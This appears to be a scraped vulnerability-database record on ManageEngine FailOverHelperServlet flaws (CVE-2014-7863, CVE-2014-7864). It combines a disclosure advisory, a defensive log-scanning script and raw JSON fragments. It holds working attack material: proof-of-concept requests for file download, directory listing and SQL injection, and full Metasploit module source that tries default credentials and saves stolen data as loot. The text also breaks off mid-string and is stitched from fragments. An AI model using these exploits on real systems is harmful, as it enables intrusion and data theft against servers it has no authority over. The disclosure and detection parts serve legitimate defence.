[The ManageOwnage Series, part XII]: Multiple vulnerabilities in FailOverServlet (OpManager, AppManager, IT360)
2015-02-02T00:00:00
ID: SECURITYVULNS:DOC:31699 | Type: securityvulns | Reporter: Securityvulns | Modified: 2015-02-02T00:00:00
Description
Hi,
This is part 12 of the ManageOwnage series. For previous parts, see [1].
This time we have an arbitrary file download, directory content
disclosure and blind SQL injection vulnerabilities in ManageEngine
OpManager, Applications Manager and IT360.
I've pushed two new Metasploit modules into the framework that exploit
the file download and the content disclosure [2], these should
hopefully be accepted soon.
The full advisory text is below, and as always you can get a copy from
my repo [3].
Regards,
Pedro
>> Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 28/01/2014 / Last updated: 28/01/2014
>> Background on the affected products:
"ManageEngine OpManager is a network and data center infrastructure
management software that helps large enterprises, service providers
and SMEs manage their data centers and IT infrastructure efficiently
and cost effectively. Automated workflows, intelligent alerting
engines, configurable discovery rules, and extendable templates enable
IT teams to setup a 24x7 monitoring system within hours of
installation."
"ManageEngine Applications Manager is a comprehensive application
monitoring software used to monitor heterogeneous business
applications such as web applications, application servers, web
servers, databases, network services, systems, virtual systems, cloud
resources, etc. It provides remote business management to the
applications or resources in the network. It is a powerful tool for
system and network administrators, helping them monitor any number of
applications or services running in the network without much manual
effort."
"Managing mission critical business applications is now made easy
through ManageEngine IT360. With agentless monitoring methodology,
monitor your applications, servers and databases with ease. Agentless
monitoring of your business applications enables you high ROI and low
TOC. With integrated network monitoring and bandwidth utilization,
quickly troubleshoot any performance related issue with your network
and assign issues automatically with ITIL based ServiceDesk
integration."
>> Technical details:
The affected servlet is the "FailOverHelperServlet" (affectionately
called FailServlet).
There are definitely more vulnerabilities than the ones identified
below - for example it is possible to hijack the failover operation
completely. The ones listed below are the easy ones to find and
exploit.
#1
Vulnerability: Arbitrary file download
CVE-2014-7863
Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360
Affected versions: ManageEngine Applications Manager v? to v11.Y
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5
POST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\boot.ini
#2
Vulnerability: Information disclosure - list all files in a directory
and its children
CVE-2014-7863 (same as #1)
Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360
Affected versions: ManageEngine Applications Manager v? to v11.Y
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5
POST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\
#3
Vulnerability: Blind SQL injection
CVE-2014-7864
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5
Constraints: unauthenticated in OpManager; authenticated in IT360
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2]
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a
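As an added defender-side example (not part of the advisory, and not ManageEngine code), the following Python scans web-server access logs for the three request patterns listed above and tags each hit with the CVE it corresponds to. It assumes a combined-format access log and that only the configured failover peer legitimately calls copyfile and listdirectory; the sample log lines are constructed from the PoC requests.

```python
"""Scan web-server access logs for the FailOverHelperServlet request patterns
from this advisory (CVE-2014-7863 file download / directory listing,
CVE-2014-7864 blind SQL injection).  Added example, not part of the advisory."""
import re
from urllib.parse import parse_qs, urlsplit

# Both servlet names seen in the advisory: the short alias and the fully
# qualified class name, optionally under an application base path.
SERVLET_RE = re.compile(
    r"/servlet/(?:com\.adventnet\.me\.opmanager\.servlet\.)?FailOverHelperServlet$"
)

# Combined-format access log line (assumed format):
#   client - - [timestamp] "METHOD URI PROTOCOL" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters and keywords that never belong in a customer name or server role.
SQLI_RE = re.compile(
    r"['\";]|--|/\*|\b(?:create|drop|insert|update|delete|select|union)\b", re.I
)


def classify(uri):
    """Map a request URI to (cve_or_None, operation, detail).

    Returns None when the URI does not hit the servlet at all."""
    parts = urlsplit(uri)
    if not SERVLET_RE.search(parts.path):
        return None
    q = parse_qs(parts.query, keep_blank_values=True)
    op = q.get("operation", [""])[0]
    if op == "copyfile":                      # arbitrary file download (#1)
        return ("CVE-2014-7863", op, q.get("fileName", [""])[0])
    if op == "listdirectory":                 # recursive directory listing (#2)
        return ("CVE-2014-7863", op, q.get("rootDirectory", [""])[0])
    if op == "standbyUpdateInCentral":        # blind SQL injection (#3)
        for key in ("customerName", "serverRole"):
            val = q.get(key, [""])[0]
            if SQLI_RE.search(val):
                return ("CVE-2014-7864", op, f"{key}={val}")
    return (None, op, "")                     # servlet hit, nothing suspicious


def scan(log_text, failover_peers=frozenset()):
    """Return one finding dict per access-log line that looks like an attack.

    failover_peers: IPs of the configured standby/primary servers.  Assumption:
    only those peers legitimately call copyfile and listdirectory, so hits
    from any other source are reported."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                          # not an access-log line we parse
        hit = classify(m["uri"])
        if hit is None:
            continue
        cve, op, detail = hit
        if cve is None:
            continue
        if cve == "CVE-2014-7863" and m["ip"] in failover_peers:
            continue                          # expected failover traffic
        findings.append({
            "ip": m["ip"], "ts": m["ts"], "cve": cve,
            "operation": op, "detail": detail, "status": int(m["status"]),
        })
    return findings


# Constructed sample log: the three PoC requests from the advisory, one
# legitimate failover update from the standby peer, and unrelated traffic.
SAMPLE_LOG = r"""
203.0.113.5 - - [02/Feb/2015:10:01:02 +0000] "POST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\boot.ini HTTP/1.1" 200 312
203.0.113.5 - - [02/Feb/2015:10:01:03 +0000] "POST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\ HTTP/1.1" 200 88213
203.0.113.9 - - [02/Feb/2015:10:02:10 +0000] "POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a HTTP/1.1" 200 0
10.0.0.2 - - [02/Feb/2015:10:03:00 +0000] "POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=corp&serverRole=standby HTTP/1.1" 200 0
10.0.0.2 - - [02/Feb/2015:10:03:01 +0000] "GET /apiclient/ember/index.jsp HTTP/1.1" 200 5120
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG, failover_peers={"10.0.0.2"}):
        print(f"{f['ts']} {f['ip']} {f['cve']} {f['operation']} {f['detail']!r}")
```

Because the servlet is reachable without authentication on OpManager and Applications Manager, any copyfile or listdirectory request from a host other than the failover peer is worth an alert even when the response status is 200.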
>> Fix:
For Applications Manager, upgrade to version 11.9 b11912.
For OpManager, install the patch for v11.4 and 11.5:
https://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservlet
Version 11.6 will be released with the patch.
These vulnerabilities remain UNFIXED in IT360.

[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110
http://seclists.org/fulldisclosure/2014/Nov/12
http://seclists.org/fulldisclosure/2014/Nov/18
http://seclists.org/fulldisclosure/2014/Nov/21
http://seclists.org/fulldisclosure/2014/Dec/9
http://seclists.org/fulldisclosure/2015/Jan/2
http://seclists.org/fulldisclosure/2015/Jan/5

[2]
https://github.com/rapid7/metasploit-framework/pull/4658
https://github.com/rapid7/metasploit-framework/pull/4659

[3]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt

CVSS v2: 7.5 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL)
attempting to login...\")\r\ncookie = login_it360\r\nif cookie.nil?\r\nprint_error(\"#{peer} - Failed to login to IT360!\")\r\nreturn\r\nend\r\nelse\r\ncookie = get_cookie\r\nend\r\nservlet = 'com.adventnet.me.opmanager.servlet.FailOverHelperServlet'\r\nres = send_request_cgi({\r\n'method' => 'GET',\r\n'cookie' => cookie,\r\n'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),\r\n})\r\nif res && res.code == 404\r\nservlet = 'FailOverHelperServlet'\r\nend\r\n# Create request\r\nbegin\r\nprint_status(\"#{peer} - Downloading file #{datastore['FILEPATH']}\")\r\nres = send_request_cgi({\r\n'method' => 'POST',\r\n'cookie' => cookie,\r\n'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),\r\n'vars_get' => {\r\n'operation' => 'copyfile',\r\n'fileName' => datastore['FILEPATH']\r\n}\r\n})\r\nrescue Rex::ConnectionRefused\r\nprint_error(\"#{peer} - Could not connect.\")\r\nreturn\r\nend\r\n# Show data if needed\r\nif res && res.code == 200\r\nif res.body.to_s.bytesize == 0\r\nprint_error(\"#{peer} - 0 bytes returned, file does not exist or is empty.\")\r\nreturn\r\nend\r\nvprint_line(res.body.to_s)\r\nfname = File.basename(datastore['FILEPATH'])\r\npath = store_loot(\r\n'manageengine.http',\r\n'application/octet-stream',\r\ndatastore['RHOST'],\r\nres.body,\r\nfname\r\n)\r\nprint_good(\"File saved in: #{path}\")\r\nelse\r\nprint_error(\"#{peer} - Failed to download file.\")\r\nend\r\nend\r\n\n\n# 0day.today [2018-01-02] #", "sourceHref": "https://0day.today/exploit/23225", "cvss": {"score": 3.7, "vector": "AV:NETWORK/AC:LOW/Au:UNKNOWN/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:29", "description": "", "cvss3": {}, "published": "2015-01-29T00:00:00", "type": "packetstorm", "title": "ManageEngine File Download / Content Disclosure / SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7863", "CVE-2014-7864"], "modified": "2015-01-29T00:00:00", "id": "PACKETSTORM:130162", "href": 
"https://packetstormsecurity.com/files/130162/ManageEngine-File-Download-Content-Disclosure-SQL-Injection.html", "sourceData": "`Hi, \n \nThis is part 12 of the ManageOwnage series. For previous parts, see [1]. \n \nThis time we have an arbitrary file download, directory content \ndisclosure and blind SQL injection vulnerabilities in ManageEngine \nOpManager, Applications Manager and IT360. \n \nI've pushed two new Metasploit modules into the framework that exploit \nthe file download and the content disclosure [2], these should \nhopefully be accepted soon. \nThe full advisory text is below, and as always you can get a copy from \nmy repo [3]. \n \nRegards, \nPedro \n \n>> Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360 \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n========================================================================== \nDisclosure: 28/01/2014 / Last updated: 28/01/2014 \n \n>> Background on the affected products: \n\"ManageEngine OpManager is a network and data center infrastructure \nmanagement software that helps large enterprises, service providers \nand SMEs manage their data centers and IT infrastructure efficiently \nand cost effectively. Automated workflows, intelligent alerting \nengines, configurable discovery rules, and extendable templates enable \nIT teams to setup a 24x7 monitoring system within hours of \ninstallation.\" \n \n\"ManageEngine Applications Manager is a comprehensive application \nmonitoring software used to monitor heterogeneous business \napplications such as web applications, application servers, web \nservers, databases, network services, systems, virtual systems, cloud \nresources, etc. It provides remote business management to the \napplications or resources in the network. 
It is a powerful tool for \nsystem and network administrators, helping them monitor any number of \napplications or services running in the network without much manual \neffort.\" \n \n\"Managing mission critical business applications is now made easy \nthrough ManageEngine IT360. With agentless monitoring methodology, \nmonitor your applications, servers and databases with ease. Agentless \nmonitoring of your business applications enables you high ROI and low \nTOC. With integrated network monitoring and bandwidth utilization, \nquickly troubleshoot any performance related issue with your network \nand assign issues automatically with ITIL based ServiceDesk \nintegration.\" \n \n \n>> Technical details: \nThe affected servlet is the \"FailOverHelperServlet\" (affectionately \ncalled FailServlet). \nThere are definitely more vulnerabilities than the ones identified \nbelow - for example it is possible to hijack the failover operation \ncompletely. The ones listed below as the easy ones to find and \nexploit. \n \n \n#1 \nVulnerability: Arbitrary file download \nCVE-2014-7863 \nConstraints: unauthenticated in OpManager and AppManager; authenticated in IT360 \nAffected versions: ManageEngine Applications Manager v? to v11.Y \nbXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5 \n \nPOST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\\\boot.ini \n \n \n#2 \nVulnerability: Information disclosure - list all files in a directory \nand its children \nCVE-2014-7863 (same as #1) \nConstraints: unauthenticated in OpManager and AppManager; authenticated in IT360 \nAffected versions: ManageEngine Applications Manager v? to v11.Y \nbXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5 \n \nPOST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\\\ \n \n \n#3 \nVulnerability: Blind SQL injection \nCVE-2014-7864 \nAffected versions: ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? 
to v10.5 \nConstraints: unauthenticated in OpManager; authenticated in IT360 \nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2] \nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a \n \n \n>> Fix: \nFor Applications Manager, upgrade to version 11.9 b11912. \n \nFor OpManager, install the patch for v11.4 and 11.5: \nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservlet \nVersion 11.6 will be released with the patch. \n \nThese vulnerabilities remain UNFIXED in IT360. \n \n \n[1] \nhttp://seclists.org/fulldisclosure/2014/Aug/55 \nhttp://seclists.org/fulldisclosure/2014/Aug/75 \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \nhttp://seclists.org/fulldisclosure/2014/Sep/1 \nhttp://seclists.org/fulldisclosure/2014/Sep/110 \nhttp://seclists.org/fulldisclosure/2014/Nov/12 \nhttp://seclists.org/fulldisclosure/2014/Nov/18 \nhttp://seclists.org/fulldisclosure/2014/Nov/21 \nhttp://seclists.org/fulldisclosure/2014/Dec/9 \nhttp://seclists.org/fulldisclosure/2015/Jan/2 \nhttp://seclists.org/fulldisclosure/2015/Jan/5 \n \n[2] \nhttps://github.com/rapid7/metasploit-framework/pull/4658 \nhttps://github.com/rapid7/metasploit-framework/pull/4659 \n \n[3] \nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/130162/meopappmanager-downloaddisclosesql.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2022-05-04T17:35:47", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2015-02-09T00:00:00", "type": "exploitdb", "title": "ManageEngine OpManager / Applications Manager / IT360 - 'FailOverServlet' Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2014-7863", "2014-7864", "CVE-2014-7863", "CVE-2014-7864"], "modified": "2015-02-09T00:00:00", "id": "EDB-ID:43894", "href": "https://www.exploit-db.com/exploits/43894", "sourceData": ">> Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 28/01/2015 / Last updated: 09/02/2015\r\n\r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. 
Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n\r\n\"ManageEngine Applications Manager is a comprehensive application monitoring software used to monitor heterogeneous business applications such as web applications, application servers, web servers, databases, network services, systems, virtual systems, cloud resources, etc. It provides remote business management to the applications or resources in the network. It is a powerful tool for system and network administrators, helping them monitor any number of applications or services running in the network without much manual effort.\"\r\n\r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n\r\n\r\n>> Technical details:\r\nThe affected servlet is the \"FailOverHelperServlet\" (affectionately called FailServlet).\r\nThere are definitely more vulnerabilities than the ones identified below - for example it is possible to hijack the failover operation completely. The ones listed below as the easy ones to find and exploit.\r\n\r\n\r\n#1\r\nVulnerability: Arbitrary file download\r\nCVE-2014-7863\r\nConstraints: unauthenticated in OpManager and AppManager; authenticated in IT360\r\nAffected versions: ManageEngine Applications Manager v? to v11.9 b11911; ManageEngine OpManager v8 - v11.5; IT360 v? 
to v10.5\r\n\r\nPOST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\\\boot.ini\r\n\r\n\r\n#2\r\nVulnerability: Information disclosure - list all files in a directory and its children\r\nCVE-2014-7863 (same as #1)\r\nConstraints: unauthenticated in OpManager and AppManager; authenticated in IT360\r\nAffected versions: ManageEngine Applications Manager v? to v11.9 b11911; ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5\r\n\r\nPOST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\\\\r\n\r\n\r\n#3\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7864\r\nAffected versions: ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5\r\nConstraints: unauthenticated in OpManager; authenticated in IT360\r\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2]\r\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a\r\n\r\n\r\n>> Fix: \r\nFor Applications Manager, upgrade to version 11.9 b11912.\r\n\r\nFor OpManager, install the patch for v11.4 and 11.5:\r\nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservlet\r\nVersion 11.6 will be released with the patch.\r\n\r\nThese vulnerabilities remain UNFIXED in IT360.\r\n\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "sourceHref": "https://www.exploit-db.com/download/43894", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-07T22:56:13", "description": "This module exploits a directory listing information disclosure vulnerability in the FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. 
It makes a recursive listing, so it will list the whole drive if you ask it to list / in Linux or C:\\ in Windows. This vulnerability is unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This module will attempt to login using the default credentials for the administrator and guest accounts; alternatively you can provide a pre-authenticated cookie or a username / password combo. For IT360 targets enter the RPORT of the OpManager instance (usually 8300). This module has been tested on both Windows and Linux with several different versions. Windows paths have to be escaped with 4 backslashes on the command line. There is a companion module that allows for arbitrary file download. This vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2015-01-28T19:44:48", "type": "metasploit", "title": "ManageEngine Multiple Products Arbitrary Directory Listing", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7863"], "modified": "2020-10-02T20:00:37", "id": 
"MSF:AUXILIARY/ADMIN/HTTP/MANAGEENGINE_DIR_LISTING", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"ManageEngine Multiple Products Arbitrary Directory Listing\",\n 'Description' => %q{\n This module exploits a directory listing information disclosure vulnerability in the\n FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It\n makes a recursive listing, so it will list the whole drive if you ask it to list / in\n Linux or C:\\ in Windows. This vulnerability is unauthenticated on OpManager and\n Applications Manager, but authenticated in IT360. This module will attempt to login\n using the default credentials for the administrator and guest accounts; alternatively\n you can provide a pre-authenticated cookie or a username / password combo. For IT360\n targets enter the RPORT of the OpManager instance (usually 8300). This module has been\n tested on both Windows and Linux with several different versions. Windows paths have to\n be escaped with 4 backslashes on the command line. There is a companion module that\n allows for arbitrary file download. 
This vulnerability has been fixed in Applications\n Manager v11.9 b11912 and OpManager 11.6.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2014-7863'],\n ['OSVDB', '117696'],\n ['URL', 'https://seclists.org/fulldisclosure/2015/Jan/114'],\n ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt']\n ],\n 'DisclosureDate' => '2015-01-28'))\n\n register_options(\n [\n Opt::RPORT(80),\n OptString.new('TARGETURI', [true, \"The base path to OpManager, AppManager or IT360\", '/']),\n OptString.new('DIRECTORY', [true, 'Path of the directory to list', '/etc/']),\n OptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),\n OptString.new('USERNAME', [false, 'The username to login as (IT360 target only)']),\n OptString.new('PASSWORD', [false, 'Password for the specified username (IT360 target only)']),\n OptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to (IT360 target only)'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def get_cookie\n cookie = nil\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(datastore['TARGETURI'])\n })\n\n if res\n cookie = res.get_cookies\n end\n\n cookie\n end\n\n def detect_it360\n res = send_request_cgi({\n 'uri' => '/',\n 'method' => 'GET'\n })\n\n if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/\n return true\n end\n\n return false\n end\n\n def get_it360_cookie_name\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('/')\n })\n\n cookie = res.get_cookies\n\n if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/\n return $1\n else\n return nil\n end\n end\n\n def authenticate_it360(port, path, username, password)\n if datastore['DOMAIN_NAME'].nil?\n vars_post = {\n 'LOGIN_ID' => username,\n 'PASSWORD' => password,\n 'isADEnabled' => 'false'\n }\n else\n vars_post = 
{\n 'LOGIN_ID' => username,\n 'PASSWORD' => password,\n 'isADEnabled' => 'true',\n 'domainName' => datastore['DOMAIN_NAME']\n }\n end\n\n res = send_request_cgi({\n 'rport' => port,\n 'method' => 'POST',\n 'uri' => normalize_uri(path),\n 'vars_get' => {\n 'service' => \"OpManager\",\n 'furl' => \"/\",\n 'timestamp' => Time.now.to_i\n },\n 'vars_post' => vars_post\n })\n\n if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\\w]{9,})/\n # /IAMAGENTTICKET([A-Z]{0,4})=([\\w]{9,})/ -> this pattern is to avoid matching \"removed\"\n return res.get_cookies\n end\n\n nil\n end\n\n\n def login_it360\n # Do we already have a valid cookie? If yes, just return that.\n unless datastore['IAMAGENTTICKET'].nil?\n cookie_name = get_it360_cookie_name\n cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'\n return cookie\n end\n\n # get the correct path, host and port\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('/')\n })\n\n if res && res.redirect?\n uri = [ res.redirection.port, res.redirection.path ]\n else\n return nil\n end\n\n if datastore['USERNAME'] && datastore['PASSWORD']\n print_status(\"Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...\")\n cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])\n unless cookie.nil?\n return cookie\n end\n end\n\n default_users = ['guest', 'administrator', 'admin']\n\n default_users.each do |user|\n print_status(\"Trying to authenticate as #{user}...\")\n cookie = authenticate_it360(uri[0], uri[1], user, user)\n unless cookie.nil?\n return cookie\n end\n end\n\n nil\n end\n\n def run\n # No point to continue if directory is not specified\n if datastore['DIRECTORY'].empty?\n print_error('Please supply the path of the directory you want to list.')\n return\n end\n\n if detect_it360\n print_status(\"Detected IT360, attempting to login...\")\n cookie = login_it360\n else\n cookie = get_cookie\n end\n\n if 
cookie.nil?\n print_error(\"Failed to get application cookies!\")\n return\n end\n\n servlet = 'com.adventnet.me.opmanager.servlet.FailOverHelperServlet'\n res = send_request_cgi({\n 'method' => 'GET',\n 'cookie' => cookie,\n 'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),\n })\n if res && res.code == 404\n servlet = 'FailOverHelperServlet'\n end\n\n # Create request\n begin\n print_status(\"Listing directory #{datastore['DIRECTORY']}\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'cookie' => cookie,\n 'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),\n 'vars_get' => {\n 'operation' => 'listdirectory',\n 'rootDirectory' => datastore['DIRECTORY']\n }\n })\n rescue Rex::ConnectionRefused\n print_error(\"Could not connect.\")\n return\n end\n\n # Show data if needed\n if res && res.code == 200 && res.body\n vprint_line(res.body.to_s)\n fname = File.basename(datastore['DIRECTORY'])\n\n path = store_loot(\n 'manageengine.http',\n 'text/plain',\n datastore['RHOST'],\n res.body.to_s,\n fname\n )\n print_good(\"File with directory listing saved in: #{path}\")\n else\n print_error(\"Failed to list directory.\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/manageengine_dir_listing.rb", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-10-07T22:45:48", "description": "This module exploits an arbitrary file download vulnerability in the FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. This vulnerability is unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This module will attempt to login using the default credentials for the administrator and guest accounts; alternatively you can provide a pre-authenticated cookie or a username and password combo. For IT360 targets enter the RPORT of the OpManager instance (usually 8300). 
This module has been tested on both Windows and Linux with several different versions. Windows paths have to be escaped with 4 backslashes on the command line. There is a companion module that allows the recursive listing of any directory. This vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2015-01-28T19:42:17", "type": "metasploit", "title": "ManageEngine Multiple Products Arbitrary File Download", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 